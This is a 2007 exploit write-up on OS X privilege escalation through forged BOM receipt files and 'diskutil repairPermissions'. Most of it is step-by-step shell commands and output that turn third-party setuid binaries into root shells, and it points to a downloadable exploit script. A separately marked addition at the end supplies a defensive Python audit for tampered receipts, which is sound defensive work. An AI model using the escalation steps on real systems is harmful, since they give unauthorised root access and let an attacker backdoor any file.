--= Talking about MoAB #5 #15 --=
OSX Privilege Escalation

Author : revenge
Date : 2007/16/01
Original Advisories:
http://projects.info-pull.com/moab/MOAB-05-01-2007.html
http://projects.info-pull.com/moab/MOAB-15-01-2007.html

----------------------------------------------------------------------
-[#] Look at that guy
----------------------------------------------------------------------

In these last days LMH from MoAB released "Multiple OS X Privilege
Escalation Vulnerabilities". I took a look at that advisory and decided
to explore it in depth. I would like to say: really nice work on BOM
files, nice work from the Apple guys and, last but not least, nice work
from 3rd party developers.

Wanna perform a privilege escalation on OS X? Really simple...

----------------------------------------------------------------------
-[#] Attacking Vector
----------------------------------------------------------------------

As first attacking vector we need to overwrite a suid binary managed by
BOM files. Once it is overwritten with a setuid shell, just execute:

$ diskutil repairPermissions /

As well described by LMH, the binary will be restored with setuid
permissions without any sanity check and we've got our suid shell.
Got pwned.

Another attacking vector involves BOM file creation/modification.
Let's do a `find` for suid binaries:

darkway:~ revenge$ sudo find / -type f -group admin -perm -4000
/Applications/IPSecuritas.app/Contents/MacOS/vpntool
/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool
/Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy
/Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool

Well, the last 3 binaries are documented by LMH; the first one is a client
for IPsec connections which I use. This one hasn't got an Archive.bom, but
it is a suid binary that I could overwrite:

darkway:/Applications/IPSecuritas.app/Contents revenge$ ls -rtl
total 16
-rw-r--r--    1 revenge  admin     8 Oct  4 15:20 PkgInfo
-rw-r--r--    1 revenge  admin  1100 Oct  4 15:20 Info.plist
drwxr-xr-x    2 revenge  admin    68 Oct  4 15:20 Resources Disabled
drwxr-xr-x   17 revenge  admin   578 Oct  4 15:20 Resources
drwxr-xr-x    5 revenge  wheel   170 Jan 16 18:36 MacOS

darkway:/Applications/IPSecuritas.app/Contents revenge$ ls -rtl MacOS/
total 2040
-rwxr-xr-x    1 root  admin  121536 Oct  4 15:20 IPSecuritasAutoStarter
-rwxr-xr-x    1 root  admin  834980 Oct  4 15:20 IPSecuritas
-rwsr-xr-x    1 root  admin   84396 Jan 16 16:47 vpntool

Now we could create an Archive.bom for the IPsec client:

darkway:/tmp revenge$ mkdir -p test/Applications/IPSecuritas.app/Contents/MacOS/
darkway:/tmp revenge$ cp /Applications/IPSecuritas.app/Contents/MacOS/* test/Applications/IPSecuritas.app/Contents/MacOS/
darkway:/tmp revenge$ sudo chmod 4755 test/Applications/IPSecuritas.app/Contents/MacOS/vpntool
darkway:/tmp revenge$ cd test
darkway:/tmp/test revenge$ mkbom ./ boom.bom
darkway:/tmp/test revenge$ lsbom boom.bom
.                                                                   40755   501/0
./Applications                                                      40755   501/0
./Applications/IPSecuritas.app                                      40755   501/0
./Applications/IPSecuritas.app/Contents                             40755   501/0
./Applications/IPSecuritas.app/Contents/MacOS                       40755   501/0
./Applications/IPSecuritas.app/Contents/MacOS/IPSecuritas           100755  501/0   834980  931126500
./Applications/IPSecuritas.app/Contents/MacOS/IPSecuritasAutoStarter 100755  501/0   121536  121663420
./Applications/IPSecuritas.app/Contents/MacOS/vpntool               104755  501/0   84396   795806674
./boom.bom                                                          100644  501/0   512     1313622608

Ok, now we've got our BOM file for IPSecuritas; just place it under
'/Library/Receipts/Essentials.pkg/Contents' (make a backup of the original
Archive.bom first):

darkway:/tmp/test revenge$ cp boom.bom /Library/Receipts/Essentials.pkg/Contents/Archive.bom

Then we could use osx_bom_escalation.pl from
http://www.0xcafebabe.it/sploits/osx_bom_escalation.tar.gz

If we have write permissions on the file we can use Mode 0 for direct
overwriting; otherwise we need an OS X machine where we have root for
creating our special Archive.bom with the right permissions: cp the target
binary to a temp directory, change permissions as we need (maybe a chmod
4777 from the root user ;) ) and create the Archive.bom as shown before.

darkway:~/mw0t/sploits/osx revenge$ perl osx_bom_escalation.pl /Applications/IPSecuritas.app/Contents/MacOS/vpntool 0 ./ipsec.bom
# Selected Target = /Applications/IPSecuritas.app/Contents/MacOS/vpntool
# Backup File at = /tmp/vpntool.bak
# Archive.bom backup at = /Library/Receipts/Essentials.pkg/Contents/Archive.bom.bak
Started verify/repair permissions on disk disk0s2 Macintosh HD
Determining correct file permissions.
parent directory ./Users/Shared/SC Info does not exist
User differs on ./Applications/IPSecuritas.app/Contents/MacOS/vpntool, should be 0, owner is 501
Group differs on ./Applications/IPSecuritas.app/Contents/MacOS/vpntool, should be 80, group is 0
Permissions differ on ./Applications/IPSecuritas.app/Contents/MacOS/vpntool, should be -rwsrwxr-x , they are -rwxr-xr-x
Owner and group corrected on ./Applications/IPSecuritas.app/Contents/MacOS/vpntool
Permissions corrected on ./Applications/IPSecuritas.app/Contents/MacOS/vpntool
The privileges have been verified or repaired on the selected volume
Verify/repair finished permissions on disk disk0s2 Macintosh HD
sh-2.05b# id
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)

Now we use Mode 1 to change the file permissions, overwriting the file
with our suid shell.

darkway:~ revenge$ perl osx_bom_escalation.pl /Library/Application\ Support/Adobe\ Systems/1.21.005/Adobe\ LM\ Service 1 ./adobe.bom
# Selected Target = /Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service
# Backup File at = /tmp/Adobe LM Service.bak
# Archive.bom backup at = /Library/Receipts/Essentials.pkg/Contents/Archive.bom.bak
Started verify/repair permissions on disk disk0s2 Macintosh HD
Determining correct file permissions.
parent directory ./Users/Shared/SC Info does not exist
Permissions differ on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service, should be -rwsrwxrwx , they are -rwsr-xr-x
Owner and group corrected on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service
Permissions corrected on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service
User differs on ./Library/Application Support/Adobe Systems/1.21.005, should be 501, owner is 0
Owner and group corrected on ./Library/Application Support/Adobe Systems/1.21.005
Permissions corrected on ./Library/Application Support/Adobe Systems/1.21.005
User differs on ./Library/Application Support/Adobe Systems, should be 501, owner is 0
Owner and group corrected on ./Library/Application Support/Adobe Systems
Permissions corrected on ./Library/Application Support/Adobe Systems
User differs on ./Library/Application Support, should be 501, owner is 0
Owner and group corrected on ./Library/Application Support
Permissions corrected on ./Library/Application Support
The privileges have been verified or repaired on the selected volume
Verify/repair finished permissions on disk disk0s2 Macintosh HD
Started verify/repair permissions on disk disk0s2 Macintosh HD
Determining correct file permissions.
parent directory ./Users/Shared/SC Info does not exist
User differs on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service, should be 0, owner is 501
Group differs on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service, should be 80, group is 0
Permissions differ on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service, should be -rwsrwxrwx , they are -rwxr-xr-x
Owner and group corrected on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service
Permissions corrected on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service
The privileges have been verified or repaired on the selected volume
Verify/repair finished permissions on disk disk0s2 Macintosh HD
sh-2.05b# id
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)

Again, got pwned, and with this kind of attack we could backdoor any file
on the system.
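The defensive counterpart to the above, added here and not part of the original write-up or of the osx_bom_escalation tool: a Python audit that parses an lsbom listing of a receipt's Archive.bom and flags every regular file whose recorded mode would make repairPermissions hand out a set-id bit or write access to group/others. The embedded listing is constructed after the lsbom format shown above; the `example-helper` entry is a placeholder standing in for a chmod 4777'd third-party binary.

```python
"""Audit an lsbom(8) listing of a receipt's Archive.bom for entries that
diskutil repairPermissions would re-apply as set-id or writable by others.
Added example, not code from the original write-up."""
import re
import stat

# lsbom default output: path, octal mode, uid/gid, then size and crc for files.
# The path is matched non-greedily so paths containing spaces still parse.
_LSBOM_LINE = re.compile(r"^(.*?)\s+([0-7]+)\s+(\d+)/(\d+)(?:\s+(\d+)\s+(\d+))?$")


def parse_lsbom(listing):
    """Yield (path, mode, uid, gid) for every parseable line of the listing."""
    for line in listing.splitlines():
        m = _LSBOM_LINE.match(line.rstrip())
        if m:
            yield m.group(1), int(m.group(2), 8), int(m.group(3)), int(m.group(4))


def audit_bom(listing):
    """Return [(path, mode, reasons)] for regular files whose mode grants set-id or write-by-others."""
    findings = []
    for path, mode, uid, gid in parse_lsbom(listing):
        if not stat.S_ISREG(mode):
            continue  # only regular files can become set-id executables
        reasons = []
        if mode & (stat.S_ISUID | stat.S_ISGID):
            reasons.append("set-id bit recorded in receipt")
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                reasons.append("set-id file writable by group/others")
            if mode & stat.S_ISUID and uid != 0:
                reasons.append("setuid file not owned by root (uid %d)" % uid)
        elif mode & stat.S_IWOTH:
            reasons.append("world-writable file")
        if reasons:
            findings.append((path, mode, tuple(reasons)))
    return findings


# Constructed sample listing modelled on the lsbom output shown above; the
# "example-helper" entry is a placeholder for a chmod 4777'd third-party binary.
SAMPLE_LISTING = """\
./Applications/IPSecuritas.app/Contents/MacOS   40755   501/0
./Applications/IPSecuritas.app/Contents/MacOS/IPSecuritas   100755  501/0   834980  931126500
./Applications/IPSecuritas.app/Contents/MacOS/vpntool   104755  501/0   84396   795806674
./Library/Application Support/Example Vendor/example-helper   104777  0/80   4096   1
./boom.bom   100644  501/0   512     1313622608
"""

if __name__ == "__main__":
    for path, mode, reasons in audit_bom(SAMPLE_LISTING):
        print("%o %s: %s" % (mode, path, "; ".join(reasons)))
```

Run against a real receipt with `lsbom /Library/Receipts/<pkg>/Contents/Archive.bom` piped into `audit_bom`; any set-id entry that the vendor's own install never needed is the kind of receipt tampering the write-up relies on.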